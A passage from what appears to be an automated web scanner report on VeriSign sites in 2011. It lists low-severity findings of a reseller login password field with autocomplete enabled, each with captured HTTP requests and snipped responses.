HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:48 GMT Server: Apache Set-Cookie: TLTHID=383DEE10DB2D10DB49FEB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 12062 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... <div id="left_panel"><form name="accountSigninForm" action="/process/retail/console_login.do" method="post"> <input name="referrerPath" type="hidden" value="">...[SNIP]... </script><input name="enrollment.account.password" type="password" id="password" class="text_input" maxlength="30" tabindex="2"> <script language="JavaScript">...[SNIP]...
11.29. http://www.verisign.ch/
Summary
Severity: Low
Confidence: Certain
Host: http://www.verisign.ch
Path: /
Issue detail
The page contains a form with the following action URL: https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /?tid=header-logo HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621600|session#1315621535113-743172#1315623400; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.2.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 31344 <!DOCTYPE html> <html lang=""> <head> <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.30. http://www.verisign.ch/contact-information/index.html
Summary
Severity: Low
Confidence: Certain
Host: http://www.verisign.ch
Path: /contact-information/index.html
Issue detail
The page contains a form with the following action URL: https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /contact-information/index.html?tid=footer HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 39107 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <link rel="stylesheet" href="/assets/corp/css/corp_generic_st...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.31. http://www.verisign.ch/corporate/index.html
Summary
Severity: Low
Confidence: Certain
Host: http://www.verisign.ch
Path: /corporate/index.html
Issue detail
The page contains a form with the following action URL: https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /corporate/index.html?tid=footer HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621596|session#1315621535113-743172#1315623396; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.1.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 36193 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <script type="text/JavaScript" src="http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js" languag...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.32. http://www.verisign.ch/trust-seal/index.html
Summary
Severity: Low
Confidence: Certain
Host: http://www.verisign.ch
Path: /trust-seal/index.html
Issue detail
The page contains a form with the following action URL: https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /trust-seal/index.html?tid=gnps HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/corporate/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621625|session#1315621535113-743172#1315623425|PC#1315621455064-973488.19#1378693568; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.3.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 50059 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>VeriSign Trust Seal - Perfec...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.33. http://www.verisign.com/
Summary
Severity: Low
Confidence: Certain
Host: http://www.verisign.com
Path: /
Issue detail
The page contains a form with the following action URL: https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET / HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621516|session#1315621455064-973488#1315623316|PC#1315621455064-973488.19#1378693458; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.1.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:37 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:24:37 GMT Content-Type: text/html Content-Length: 34615 <!DOCTYPE html> <html lang=""> <head> <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.34. http://www.verisign.com/assets/trust-seal/images/FreeTrialButton-hover.png,/assets/trust-seal/images/BuyButton-hover.png,/assets/trust-seal/images/omer-png8.png,/assets/trust-seal/images/hadleigh-png8.png,/assets/trust-seal/images/diane-png8.png,/assets/trust-seal/images/matthew-png8.png
Summary
Severity: Low
Confidence: Certain
Host: http://www.verisign.com
Path: /assets/trust-seal/images/FreeTrialButton-hover.png,/assets/trust-seal/images/BuyButton-hover.png,/assets/trust-seal/images/omer-png8.png,/assets/trust-seal/images/hadleigh-png8.png,/assets/trust-seal/images/diane-png8.png,/assets/trust-seal/images/matthew-png8.png
Issue detail
The page contains a form with the following action URL: https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /assets/trust-seal/images/FreeTrialButton-hover.png,/assets/trust-seal/images/BuyButton-hover.png,/assets/trust-seal/images/omer-png8.png,/assets/trust-seal/images/hadleigh-png8.png,/assets/trust-seal/images/diane-png8.png,/assets/trust-seal/images/matthew-png8.png HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581
Response
HTTP/1.1 404 Not Found Date: Fri, 09 Sep 2011 21:26:14 GMT Server: Apache X-Powered-By: PHP/5.2.13 Content-Type: text/html Content-Length: 77864 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte IE 7...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.35. http://www.verisign.com/code-signing/index.html
Summary
Severity: Low
Confidence: Certain
Host: http://www.verisign.com
Path: /code-signing/index.html
Issue detail
The page contains a form with the following action URL: https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /code-signing/index.html?tid=a_box HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; mbox=session#1315621455064-973488#1315623513|PC#1315621455064-973488.19#1378693653|check#true#1315621713; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:08 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:27:08 GMT Content-Type: text/html Content-Length: 103179 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!--HEADER ASSETS...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.36. http://www.verisign.com/partners/ssl-reseller-programs/index.html
Summary
Severity: Low
Confidence: Certain
Host: http://www.verisign.com
Path: /partners/ssl-reseller-programs/index.html
Issue detail
The page contains a form with the following action URL: https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /partners/ssl-reseller-programs/index.html HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623565|PC#1315621455064-973488.19#1378693705|check#true#1315621765
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:13 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:28:13 GMT Content-Type: text/html Content-Length: 51846 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte IE 7...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.37. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html
Summary
Severity: Low
Confidence: Certain
Host: http://www.verisign.com
Path: /partners/ssl-reseller-programs/resell-ssl/enrollment/index.html
Issue detail
The page contains a form with the following action URL: https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /partners/ssl-reseller-programs/resell-ssl/enrollment/index.html HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ui-tabs-[object Object]=0; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623590|PC#1315621455064-973488.19#1378693730|check#true#1315621790; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; IS3_History=1315509977-2-99____; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.9.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:24 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:28:24 GMT Content-Type: text/html Content-Length: 34515 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte IE 7...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.38. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html
Summary
Severity: Low
Confidence: Certain
Host: http://www.verisign.com
Path: /partners/ssl-reseller-programs/resell-ssl/index.html
Issue detail
The page contains a form with the following action URL: https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /partners/ssl-reseller-programs/resell-ssl/index.html HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/partners/ssl-reseller-programs/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ui-tabs-[object Object]=0; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623583|PC#1315621455064-973488.19#1378693723|check#true#1315621783; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.8.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509963-1-99____; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:19 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:28:19 GMT Content-Type: text/html Content-Length: 37523 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte IE 7...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.39. http://www.verisign.com/ssl/buy-ssl-certificates/index.html
Summary
Severity: Low
Confidence: Certain
Host: http://www.verisign.com
Path: /ssl/buy-ssl-certificates/index.html
Issue detail
The page contains a form with the following action URL: https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /ssl/buy-ssl-certificates/index.html HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:59:43 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:59:43 GMT Content-Type: text/html Content-Length: 104571 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <META HTTP-EQUIV="X-UA-Compatible" CONTENT="IE=EmulateIE7" /> <!--HEADER ASSETS--> <link href="ht...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.40. http://www.verisign.com/trust-seal/index.html
Summary
Severity: Low
Confidence: Certain
Host: http://www.verisign.com
Path: /trust-seal/index.html
Issue detail
The page contains a form with the following action URL: https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /trust-seal/index.html?tid=gnps HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621628|session#1315621455064-973488#1315623428|PC#1315621455064-973488.19#1378693568
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:13 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:26:13 GMT Content-Type: text/html Content-Length: 49851 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <META HTTP-EQUIV="X-UA-Comp...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.41. http://www.verisign.com/verisign-worldwide/index.html
Summary
Severity: Low
Confidence: Certain
Host: http://www.verisign.com
Path: /verisign-worldwide/index.html
Issue detail
The page contains a form with the following action URL: https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /verisign-worldwide/index.html?tid=footer HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:26:10 GMT Content-Type: text/html Content-Length: 42646 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.42. https://www.verisign.com/
Summary
Severity: Low
Confidence: Certain
Host: https://www.verisign.com
Path: /
Issue detail
The page contains a form with the following action URL: https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET / HTTP/1.1 Host: www.verisign.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____
Response
